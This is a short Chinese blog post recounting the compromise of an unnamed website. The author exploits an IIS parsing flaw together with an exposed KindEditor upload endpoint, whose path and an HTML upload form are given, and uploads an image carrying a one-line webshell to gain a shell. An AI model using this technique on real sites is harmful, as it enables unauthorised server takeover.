• 首页
  • 渗透
  • 折腾
  • 转载
  • 关于Me
  • 榜上有名
  • 文章存档
  • 友情链接

不妨看看这里

会员面板

Base64 Image

思路决定出路

  • Mr.Wu
  • 2019-07-13
  • 0
某站,经测试发现存在 IIS 解析漏洞,且支持PHP 该站程序基于 ACTCMS 可以找 0day 来渗透,但是既然发现了解析漏洞,那么也不能那么简单就放弃掉这个突破点, 网站前台并没有发现上传点,所以换了个思路,用御剑扫出来 KindEditor 编辑器,然后百度了下该编辑器,得到 KindEditor 上传后端处理地址:/editor/kindeditor/asp/upload_json.asp?dir=image 编写上传表单:
<body>
    <form action="http://xx/editor/kindeditor/asp/upload_json.asp?dir=image" method="post" enctype="multipart/form-data">
    <input type="file" name="imgFile" />
    <input type="submit" value="上传文件" />
    </form>
</body>
通过上传表单成功上传图片一句话,成功 getshell 总结一下:好吧,么有总结,其实就是随便发个文章凑下内容的啦。。
© 2025 MrWu
Theme by Wing-child
  • {{ item.name }}
  • {{ item.name }}